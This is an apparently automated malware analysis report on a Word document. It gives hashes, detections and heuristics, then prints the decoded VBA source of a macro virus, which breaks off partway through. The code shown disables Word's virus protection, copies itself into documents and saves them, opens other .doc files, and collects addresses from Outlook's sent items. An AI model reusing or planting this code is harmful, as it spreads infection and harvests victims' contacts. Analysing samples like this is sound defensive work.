Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 59b92d6befe0dca6…

MALICIOUS

Office (OLE)

42.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: dd554033ba5826f18893ed4103edd039 SHA-1: b23ace2c1c72597696008962b8e5f7c35b8d8826 SHA-256: 59b92d6befe0dca6339a128258ed6595b208c9a03dba58b33706dc86437e0615
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro that utilizes CreateObject. This indicates an attempt to execute malicious code. The presence of ClamAV detections like Win.Trojan.Pivis-2 and Win.Trojan.C-286 further confirms its malicious nature. The macro's functionality, though truncated, suggests it is designed to download and execute a second-stage payload, consistent with a common phishing attachment attack vector.

Heuristics 5

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21177 bytes
SHA-256: f5e4db21ca46fe8d413e7df59855152659f5a263e65fbd3bad7f53fd376abfb4
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit 'Cod
Private Declare Function RasEnumConnections Lib "RasApi32.dll" Alias "RasEnumConnectionsA" (lpRasCon As Any, lpcb As Long, lpcConnections As Long) As Long
Private Declare Function RasGetConnectStatus Lib "RasApi32.dll" Alias "RasGetConnectStatusA" (ByVal hRasCon As Long, lpStatus As Any) As Long
Private Const RAS95_MaxEntryName = 256: Private Const RAS95_MaxDeviceType = 16: Private Const RAS95_MaxDeviceName = 32
Private Type RASCONNSTATUS95: dwSize As Long: RasConnState As Long: dwError As Long: szDeviceType(RAS95_MaxDeviceType) As Byte: szDeviceName(RAS95_MaxDeviceName) As Byte: End Type
Private Type RASCONN95: dwSize As Long: hRasCon As Long: szEntryName(RAS95_MaxEntryName) As Byte: szDeviceType(RAS95_MaxDeviceType) As Byte: szDeviceName(RAS95_MaxDeviceName) As Byte: End Type
Dim Copia As Boolean
Private Sub Document_New()
On Error Resume Next
    Copia = True: Document_Open
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim TRasCon(255) As RASCONN95, Lg As Long, lPcon As Long, RetVal As Long, Tstatus As RASCONNSTATUS95
Dim A As Object, M As Object, Envia As Object, U As Object, Nao As Boolean, Doc As Object, F As Object
Dim A2 As Integer, I As Integer, Conteudo As String, Email As New Collection, I1 As Integer
Dim D As Document, Appli As New Application, Macro As String, IsConnected As Boolean
    Application.EnableCancelKey = wdCancelDisabled
    With Options
        .ConfirmConversions = False: .VirusProtection = False: .SaveNormalPrompt = False
    End With
    A2 = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    Macro = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, A2)
    Set Doc = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Conteudo = Doc.Lines(1, 1)
    If Conteudo <> "Option Explicit 'Cod" Then
        If Conteudo <> "" Then Doc.DeleteLines 1, Doc.CountOfLines
        Doc.InsertLines 1, Macro
        With Dialogs(wdDialogFileSummaryInfo): .Title = "LUCIA": .Author = "LUCIA": .Execute: End With
        If ActiveDocument.Saved = False And UCase(Right(ActiveDocument.FullName, 3)) = "DOC" Then ActiveDocument.Save
    End If
    If Dir(Options.DefaultFilePath(wdDocumentsPath) & "\UT987456.117") <> "" Then
        Exit Sub
    End If
    If Copia Then Exit Sub
    
    TRasCon(0).dwSize = 412
    Lg = 256 * TRasCon(0).dwSize
    RetVal = RasEnumConnections(TRasCon(0), Lg, lPcon)
    Tstatus.dwSize = 160
    RetVal = RasGetConnectStatus(TRasCon(0).hRasCon, Tstatus)
    IsConnected = (Tstatus.RasConnState = &H2000)
    Set A = CreateObject("Outlook.Application")
    If Err.Number <> 0 Or Not IsConnected Then
        Open Options.DefaultFilePath(wdDocumentsPath) & "\UT987456.117" For Output As #1
        Close 1
        Set F = Application.FileSearch
        F.FileName = "*.doc"
        F.LookIn = Options.DefaultFilePath(wdDocumentsPath)
        F.SearchSubFolders = False
        F.Execute
        A2 = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        If F.FoundFiles.Count > 0 Then
            For I1 = 1 To F.FoundFiles.Count
                Set D = Appli.Documents.Open(F.FoundFiles(I1))
            Next I1
        End If
        Kill Options.DefaultFilePath(wdDocumentsPath) & "\UT987456.117"
    Else
        Set U = A.GetNamespace("MAPI"): Set M = U.GetDefaultFolder(5)
        For I = 1 To M.Items.Count
            Conteudo = Trim(M.Items(I).To)
            If Left(Conteudo, 1) = "'" And Right(Conteudo, 1) = "'" Then Conteudo = Mid(Conteudo, 2, Len(Conteudo) - 2)
            If Conteudo Like "*@*" And Trim(Conteudo) <> "" Then
                If Email.Count <> 0 Then
                    For A2 = 1 To Email.Count
                        If Conteudo = Email.Item(A2) Then
                     
... (truncated)